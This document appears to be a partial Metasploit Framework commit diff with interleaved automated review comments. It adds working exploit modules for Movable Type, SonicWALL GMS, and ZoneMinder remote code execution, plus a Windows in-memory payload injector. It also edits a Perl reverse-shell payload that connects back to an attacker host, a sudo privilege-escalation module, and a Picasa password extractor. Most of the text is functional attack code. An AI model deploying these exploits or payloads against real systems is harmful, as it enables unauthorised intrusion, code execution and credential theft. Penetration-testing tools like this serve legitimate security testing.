--- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb new file mode 100644 index 0000000000..96c4a846cb --- /dev/null +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb 
@@ -0,0 +1,122 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution', + 'Description' => %q{ + This module can be used to execute a payload on MoveableType (MT) that + exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi), + that is used during installation and updating of the platform. + The vulnerability arises due to the following properties: + 1. This script may be invoked remotely without requiring authentication + to any MT instance. + 2. Through a crafted POST request, it is possible to invoke particular + database migration functions (i.e functions that bring the existing + database up-to-date with an updated codebase) by name and with + particular parameters. + 3. A particular migration function, core_drop_meta_for_table, allows + a class parameter to be set which is used directly in a perl eval + statement, allowing perl code injection. 
+ }, + 'Author' => + [ + 'Kacper Nowak', + 'Nick Blundell', + 'Gary O\'Leary-Steele' + ], + 'References' => + [ + ['CVE', '2012-6315'], # superseded by CVE-2013-0209 (duplicate) + ['CVE', '2013-0209'], + ['URL', 'http://www.sec-1.com/blog/?p=402'], + ['URL', 'http://www.movabletype.org/2013/01/movable_type_438_patch.html'] + ], + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd' + } + }, + 'Platform' => + [ + 'win', + 'unix' + ], + 'Targets' => + [ + ['Movable Type 4.2x, 4.3x', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jan 07 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path of the Movable Type installation', '/mt']) + ], self.class) + end + + def check + @peer = "#{rhost}:#{rport}" + fingerprint = rand_text_alpha(5) + print_status("#{@peer} - Sending check...") + begin + res = http_send_raw(fingerprint) + rescue Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + if (res) + if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/) + return Exploit::CheckCode::Vulnerable + elsif (res.code != 200) + return Exploit::CheckCode::Unknown + else + return Exploit::CheckCode::Safe + end + else + return Exploit::CheckCode::Unknown + end + end + + def exploit + @peer = "#{rhost}:#{rport}" + print_status("#{@peer} - Sending payload...") + http_send_cmd(payload.encoded) + end + + def http_send_raw(cmd) + path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi' + pay = cmd.gsub('\\', '\\\\').gsub('"', '\"') + send_request_cgi( + { + 'uri' => path, + 'method' => 'POST', + 'vars_post' => + { + '__mode' => 'run_actions', + 'installing' => '1', + 'steps' => %{[["core_drop_meta_for_table","class","#{pay}"]]} + } + }) + end + + def http_send_cmd(cmd) + pay = 'v0;use MIME::Base64;system(decode_base64(q(' + pay << Rex::Text.encode_base64(cmd) + pay << ')));return 0' + http_send_raw(pay) + end +end 
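Review bot: In `http_send_raw`, `cmd.gsub('\\', '\\\\')` does not double backslashes: the replacement argument of `gsub` is itself escape-processed, so the two-character string `\\` yields a single backslash and the call is a no-op. Use the block form, `pay = cmd.gsub('\\') { '\\\\' }.gsub('"', '\"')`, whose return value is inserted literally. In practice the payload built by `http_send_cmd` is base64 text, so the defect probably only shows when `http_send_raw` is called with other input, as `check` does with `rand_text_alpha`. The `if (res)` / `if (res.code == 200 and ...)` conditions in `check` would conventionally drop the parentheses and use `&&`.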
diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb
new file mode 100644
index 0000000000..4abf1ce645
--- /dev/null
+++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb
@@ -0,0 +1,279 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GoodRanking + + HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SonicWALL GMS 6 Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in SonicWALL GMS. It exploits two + vulnerabilities in order to get its objective. An authentication bypass in the + Web Administration interface allows to abuse the "appliance" application and upload + an arbitrary payload embedded in a JSP. The module has been tested successfully on + SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual + Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run + successfully while testing, shell payload have been used. 
+ }, + 'Author' => + [ + 'Nikolas Sotiriu', # Vulnerability Discovery + 'Julian Vilas ', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-1359'], + [ 'OSVDB', '89347' ], + [ 'BID', '57445' ], + [ 'EDB', '24204' ] + ], + 'Privileged' => true, + 'Platform' => [ 'win', 'linux' ], + 'Targets' => + [ + [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2', + { + 'Arch' => ARCH_X86, + 'Platform' => 'win' + } + ], + [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + } + ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 17 2012')) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/']) + ], self.class) + end + + + def on_new_session + # on_new_session will force stdapi to load (for Linux meterpreter) + end + + + def generate_jsp + var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8) + var_exepath = Rex::Text.rand_text_alpha(rand(8)+8) + var_data = Rex::Text.rand_text_alpha(rand(8)+8) + var_inputstream = Rex::Text.rand_text_alpha(rand(8)+8) + var_outputstream = Rex::Text.rand_text_alpha(rand(8)+8) + var_numbytes = Rex::Text.rand_text_alpha(rand(8)+8) + var_bytearray = Rex::Text.rand_text_alpha(rand(8)+8) + var_bytes = Rex::Text.rand_text_alpha(rand(8)+8) + var_counter = Rex::Text.rand_text_alpha(rand(8)+8) + var_char1 = Rex::Text.rand_text_alpha(rand(8)+8) + var_char2 = Rex::Text.rand_text_alpha(rand(8)+8) + var_comb = Rex::Text.rand_text_alpha(rand(8)+8) + var_exe = Rex::Text.rand_text_alpha(rand(8)+8) + @var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8) + var_proc = Rex::Text.rand_text_alpha(rand(8)+8) + var_fperm = Rex::Text.rand_text_alpha(rand(8)+8) + var_fdel = Rex::Text.rand_text_alpha(rand(8)+8) + + jspraw = "<%@ page import=\"java.io.*\" %>\n" + jspraw << "<%\n" + jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"/#{@var_hexfile}.txt\";\n" + jspraw 
<< "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" + jspraw << "String #{var_data} = \"\";\n" + + jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" + jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" + jspraw << "}\n" + + jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" + jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" + + jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n" + jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" + jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" + jspraw << "#{var_inputstream}.close();\n" + + jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n" + jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" + jspraw << "{\n" + jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" + jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" + jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" + jspraw << "#{var_comb} <<= 4;\n" + jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" + jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" + jspraw << "}\n" + + jspraw << "#{var_outputstream}.write(#{var_bytes});\n" + jspraw << "#{var_outputstream}.close();\n" + + jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n" + jspraw << "String[] #{var_fperm} = new String[3];\n" + jspraw << "#{var_fperm}[0] = \"chmod\";\n" + jspraw << "#{var_fperm}[1] = \"+x\";\n" + jspraw << "#{var_fperm}[2] = #{var_exepath};\n" + jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n" + jspraw << "if (#{var_proc}.waitFor() == 0) {\n" + jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" + jspraw << "}\n" + # Linux and other UNICES 
allow removing files while they are in use... + jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n" + jspraw << "} else {\n" + # Windows does not .. + jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" + jspraw << "}\n" + + jspraw << "%>\n" + return jspraw + end + + def get_install_path + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'method' => 'POST', + 'connection' => 'TE, close', + 'headers' => + { + 'TE' => "deflate,gzip;q=0.3", + }, + 'vars_post' => { + 'num' => '123456', + 'action' => 'show_diagnostics', + 'task' => 'search', + 'item' => 'application_log', + 'criteria' => '*.*', + 'width' => '500' + } + }) + + if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/ + return $1 + end + + return nil + end + + def upload_file(location, filename, contents) + post_data = Rex::MIME::Message.new + post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"") + post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"") + post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"") + post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#(unknown)\"") + + data = post_data.to_s + data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") + + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", + 'method' => 'POST', + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + 'headers' => + { + 'TE' => "deflate,gzip;q=0.3", + }, + 'connection' => 'TE, close' + }) + + if res and res.code == 200 and res.body.empty? + return true + else + return false + end + end + + def check + @peer = "#{rhost}:#{rport}" + @uri = normalize_uri(target_uri.path) + @uri << '/' if @uri[-1,1] != '/' + + if get_install_path.nil? 
+ return Exploit::CheckCode::Safe + end + + return Exploit::CheckCode::Vulnerable + end + + def exploit + @peer = "#{rhost}:#{rport}" + @uri = normalize_uri(target_uri.path) + @uri << '/' if @uri[-1,1] != '/' + + # Get Tomcat installation path + print_status("#{@peer} - Retrieving Tomcat installation path...") + install_path = get_install_path + + if install_path.nil? + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") + end + + print_good("#{@peer} - Tomcat installed on #{install_path}") + + if target['Platform'] == "linux" + @location = "#{install_path}webapps/appliance/" + elsif target['Platform'] == "win" + @location = "#{install_path}webapps\\appliance\\" + end + + + # Upload the JSP and the raw payload + @jsp_name = rand_text_alphanumeric(8+rand(8)) + + jspraw = generate_jsp + + # Specify the payload in hex as an extra file.. + payload_hex = payload.encoded_exe.unpack('H*')[0] + + print_status("#{@peer} - Uploading the payload") + + if upload_file(@location, "#{@var_hexfile}.txt", payload_hex) + print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt") + else + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload") + end + + print_status("#{@peer} - Uploading the payload") + + if upload_file(@location, "#{@jsp_name}.jsp", jspraw) + print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp") + else + fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp") + end + + print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") + res = send_request_cgi( + { + 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", + 'method' => 'GET' + }) + + if res and res.code != 200 + print_warning("#{@peer} - Error triggering the payload") + end + + register_files_for_cleanup("#{@location}#{@var_hexfile}.txt") + register_files_for_cleanup("#{@location}#{@jsp_name}.jsp") + end + +end 
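Review bot: The status line printed before the second `upload_file` call in `exploit` repeats the first one, `print_status("#{@peer} - Uploading the payload")`, although that call uploads the JSP; it should read `print_status("#{@peer} - Uploading the JSP")` so the two uploads can be told apart in the log. `get_install_path` reads the capture through `$1`; `Regexp.last_match(1)` says the same thing without the global, and the greedy `/VALUE="(.*)logs/` deserves a comment on why the last `logs` on the line is the intended anchor. The multipart part name in `upload_file` shows as `filename=\"#(unknown)\"` here, which looks like a rendering artifact of `#{filename}` rather than the intended literal, but it is worth confirming since `filename` is otherwise unused in that method. `'DisclosureDate' => 'Jan 17 2012'` sits next to 2013 references and a 2013 CVE, so the year may be a typo to confirm.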
diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index f53da514dd..4bf8cc5abd 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb index 1c4bfc9e07..1ff0316708 100644 --- a/modules/exploits/multi/http/struts_code_exec.rb +++ b/modules/exploits/multi/http/struts_code_exec.rb @@ -8,7 +8,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking + Rank = GoodRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index caa7d8b2da..f33f57bfb1 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote ] ], 'DisclosureDate' => 'Jan 06 2012', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 2)) register_options( [ diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb new file mode 100644 index 0000000000..c405327ab0 --- /dev/null +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb 
@@ -0,0 +1,148 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'ZoneMinder Video Server packageControl Command Execution', + 'Description' => %q{ + This module exploits a command execution vulnerability in ZoneMinder Video + Server version 1.24.0 to 1.25.0 which could be abused to allow + authenticated users to execute arbitrary commands under the context of the + web server user. The 'packageControl' function in the + 'includes/actions.php' file calls 'exec()' with user controlled data + from the 'runState' parameter. + }, + 'References' => + [ + ['URL', 'http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/'], + ], + 'Author' => + [ + 'Brendan Coles ', # Discovery and exploit + ], + 'License' => MSF_LICENSE, + 'Privileged' => true, + 'Arch' => ARCH_CMD, + 'Platform' => 'unix', + 'Payload' => + { + 'BadChars' => "\x00", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic telnet python perl bash', + }, + }, + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true }] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => "Jan 22 2013", + )) + + register_options([ + OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']), + OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']), + OptString.new('TARGETURI', [true, 'The path to the web application', '/zm/']) + ], self.class) + end + + def check + + peer = "#{rhost}:#{rport}" + base = target_uri.path + base << '/' if base[-1, 1] != '/' + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + 
cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) + data = "action=login&view=version&username=#{user}&password=#{pass}" + + # login and retrieve software version + print_status("#{peer} - Authenticating as user '#{user}'") + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}index.php", + 'cookie' => "#{cookie}", + 'data' => "#{data}", + }) + if res and res.code == 200 + if res.body =~ /ZM - Login<\/title>/ + print_error("#{peer} - Authentication failed") + return Exploit::CheckCode::Unknown + elsif res.body =~ /v1.2(4\.\d+|5\.0)/ + return Exploit::CheckCode::Appears + elsif res.body =~ /<title>ZM/ + return Exploit::CheckCode::Detected + end + end + return Exploit::CheckCode::Safe + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp + print_error("#{peer} - Connection failed") + end + return Exploit::CheckCode::Unknown + + end + + def exploit + + @peer = "#{rhost}:#{rport}" + base = target_uri.path + base << '/' if base[-1, 1] != '/' + cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + data = "action=login&view=postlogin&username=#{user}&password=#{pass}" + command = Rex::Text.uri_encode(payload.encoded) + + # login + print_status("#{@peer} - Authenticating as user '#{user}'") + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}index.php", + 'cookie' => "#{cookie}", + 'data' => "#{data}", + }) + if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/ + fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + print_good("#{@peer} - Authenticated successfully") + + # send payload + print_status("#{@peer} - Sending payload (#{command.length} bytes)") + begin + res = send_request_cgi({ + 'method' => 'POST', + 
'uri' => "#{base}index.php", + 'data' => "view=none&action=state&runState=start;#{command}%26", + 'cookie' => "#{cookie}" + }) + if res and res.code == 200 + print_good("#{@peer} - Payload sent successfully") + else + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + end + +end + diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb new file mode 100644 index 0000000000..0e748cb607 --- /dev/null +++ b/modules/exploits/windows/local/payload_inject.rb 
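Review bot: The rescue clause in `check` names `::Rex::ConnectionTimeoutp`, which does not exist; the constant is only resolved when an exception reaches that clause, so a timeout during `check` surfaces as a NameError instead of the intended "Connection failed" message. It should match the clause in `exploit`: `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`. Both methods also interpolate USERNAME and PASSWORD unencoded into `data`, so a password containing `&`, `%` or `+` produces a malformed form body; passing `'vars_post' => { 'action' => 'login', 'view' => 'version', 'username' => user, 'password' => pass }` lets `send_request_cgi` encode the values. `base << '/'` mutates the string returned by `target_uri.path`; `normalize_uri(target_uri.path)`, as used by the other modules in this commit, avoids that.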
@@ -0,0 +1,176 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/exploit/exe' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Memory Payload Injection', + 'Description' => %q{ + This module will inject a payload into memory of a process. If a payload + isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID + datastore option isn't specified, then it'll inject into notepad.exe instead. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Carlos Perez <carlos_perez[at]darkoperator.com>', + 'sinn3r' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> "Oct 12 2011" + )) + + register_options( + [ + OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']), + OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false]) + ], self.class) + end + + # Run Method for when run command is issued + def exploit + @payload_name = datastore['PAYLOAD'] + @payload_arch = framework.payloads.create(@payload_name).arch + + # syinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? 
+ + pid = get_pid + if not pid + print_error("Unable to get a proper PID") + return + end + + if @payload_arch.first =~ /64/ and client.platform =~ /x86/ + print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") + print_error("Migrate to an x64 process and try again.") + return false + else + inject_into_pid(pid) + end + end + + # Figures out which PID to inject to + def get_pid + pid = datastore['PID'] + if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid) + print_status("Launching notepad.exe...") + pid = create_temp_proc + end + + return pid + end + + + # Determines if a PID actually exists + def has_pid?(pid) + procs = [] + begin + procs = client.sys.process.processes + rescue Rex::Post::Meterpreter::RequestError + print_error("Unable to enumerate processes") + return false + end + + pids = [] + + procs.each do |p| + found_pid = p['pid'] + return true if found_pid == pid + end + + print_error("PID #{pid.to_s} does not actually exist.") + + return false + end + + # Checks the Architeture of a Payload and PID are compatible + # Returns true if they are false if they are not + def arch_check(pid) + # get the pid arch + client.sys.process.processes.each do |p| + # Check Payload Arch + if pid == p["pid"] + vprint_status("Process found checking Architecture") + if @payload_arch.first == p['arch'] + vprint_good("Process is the same architecture as the payload") + return true + else + print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.") + return false + end + end + end + end + + # Creates a temp notepad.exe to inject payload in to given the payload + # Returns process PID + def create_temp_proc() + windir = client.fs.file.expand_path("%windir%") + # Select path of executable to run depending the architecture + if @payload_arch.first== "x86" and client.platform =~ /x86/ + cmd = "#{windir}\\System32\\notepad.exe" + elsif @payload_arch.first == "x86_64" and client.platform =~ /x64/ 
+ cmd = "#{windir}\\System32\\notepad.exe" + elsif @payload_arch.first == "x86_64" and client.platform =~ /x86/ + cmd = "#{windir}\\Sysnative\\notepad.exe" + elsif @payload_arch.first == "x86" and client.platform =~ /x64/ + cmd = "#{windir}\\SysWOW64\\notepad.exe" + end + + begin + proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) + rescue Rex::Post::Meterpreter::RequestError + return nil + end + + return proc.pid + end + + def inject_into_pid(pid) + vprint_status("Performing Architecture Check") + return if not arch_check(pid) + + begin + print_status("Preparing '#{@payload_name}' for PID #{pid}") + raw = payload.generate + + print_status("Opening process #{pid.to_s}") + host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + if not host_process + print_error("Unable to open #{pid.to_s}") + return + end + + print_status("Allocating memory in procees #{pid}") + mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) + + # Ensure memory is set for execution + host_process.memory.protect(mem) + + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, raw) + host_process.thread.create(mem, 0) + print_good("Successfully injected payload in to process: #{pid}") + + rescue Rex::Post::Meterpreter::RequestError => e + print_error("Unable to inject payload:") + print_line(e.to_s) + end + end + +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index 37bb01b97d..837e089ef6 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb 
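Review bot: `get_pid` does not handle the case where PID is unset: the option has no default, so `datastore['PID']` is nil, `nil == 0` is false, and `has_pid?(nil)` prints a misleading "PID  does not actually exist." before the notepad fallback runs. Coercing first, `if pid.to_i == 0 or datastore['NEWPROCESS'] or not has_pid?(pid)`, keeps the fallback silent for the default configuration. In `has_pid?` the `pids = []` local is unused and the loop reduces to `return true if procs.any? { |p| p['pid'] == pid }`. `inject_into_pid` allocates `raw.length + (raw.length % 1024)` bytes; if the intent was to round up to a 1024-byte multiple, that expression adds the remainder rather than the padding, so a comment stating the intended size would help (the allocation is never smaller than `raw.length`, so it is not unsafe as written).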
@@ -48,7 +48,7 @@ module Metasploit3
 lhost = datastore['LHOST']
 ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
 lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
- cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
+ cmd = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}
 end
 end
diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb
index e2e1273030..41155587d1 100644
--- a/modules/post/multi/manage/sudo.rb
+++ b/modules/post/multi/manage/sudo.rb
@@ -30,7 +30,11 @@ class Metasploit3 < Msf::Post
 versions from 2008 and later which support -A.
 },
 'License' => MSF_LICENSE,
- 'Author' => [ 'todb <todb[at]metasploit.com>'],
+ 'Author' =>
+ [
+ 'todb <todb[at]metasploit.com>',
+ 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option
+ ],
 'Platform' => [ 'linux','unix','osx','solaris','aix' ],
 'References' =>
 [
@@ -39,6 +43,11 @@ class Metasploit3 < Msf::Post
 ],
 'SessionTypes' => [ 'shell' ] # Need to test 'meterpreter'
 ))
+
+ register_options(
+ [
+ OptString.new('PASSWORD', [false, 'The password to use when running sudo.'])
+ ], self.class)
 end
 # Run Method for when run command is issued
@@ -57,7 +66,12 @@ class Metasploit3 < Msf::Post
 end
 def get_root
- password = session.exploit_datastore['PASSWORD']
+ if datastore['PASSWORD']
+ password = datastore['PASSWORD']
+ else
+ password = session.exploit_datastore['PASSWORD']
+ end
+
 if password.to_s.empty?
 print_status "No password available, trying a passwordless sudo."
 else
diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
index ff188cd141..8977cbcc5e 100644
--- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
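Review bot: The switch from a single-quoted to a double-quoted `-e` body with backslash-escaped inner quotes reads as cosmetic unless the reason is recorded, so the new `cmd =` line deserves a comment such as `# cmd.exe does not treat single quotes as quoting characters, so the perl -e body must be double-quoted and its inner quotes escaped`. Inside the `%{...}` literal Ruby still interpolates `#{ver}`, `#{lhost}` and `#{datastore['LPORT']}` while leaving `$p`, `$c`, `$~` and `$_` for perl, which is presumably the intent but is easy to misread at a glance. The enclosing method starts outside the hunk.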
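Review bot: The five-line `if datastore['PASSWORD'] ... else ... end` added to get_root is a fallback that Ruby spells in one line, `password = datastore['PASSWORD'] || session.exploit_datastore['PASSWORD']`, and the existing `password.to_s.empty?` check below already covers a nil result. In either spelling a PASSWORD set to an empty string is truthy, so it shadows the session's exploit datastore value and drops into the passwordless path; if that is intended, a one-line comment saying so would save the next reader a check. get_root's body continues past the end of the hunk.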
+++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb
@@ -19,18 +19,18 @@ class Metasploit3 < Msf::Post
 def initialize(info={})
 super( update_info( info,
- 'Name' => 'Windows Gather Google Picasa Password Extractor',
+ 'Name' => 'Windows Gather Google Picasa Password Extractor',
 'Description' => %q{
 This module extracts and decrypts the login passwords stored by Google Picasa.
 },
- 'License' => MSF_LICENSE,
- 'Author' =>
+ 'License' => MSF_LICENSE,
+ 'Author' =>
 [
 'SecurityXploded Team', #www.SecurityXploded.com
 'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>',
 ],
- 'Platform' => [ 'win' ],
+ 'Platform' => [ 'win' ],
 'SessionTypes' => [ 'meterpreter' ]
 ))
 end
@@ -70,33 +70,12 @@ class Metasploit3 < Msf::Post
 end
 def get_registry
- psecrets = ""
 begin
 print_status("Looking in registry for stored login passwords by Picasa ...")
- username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
- 'GaiaEmail')
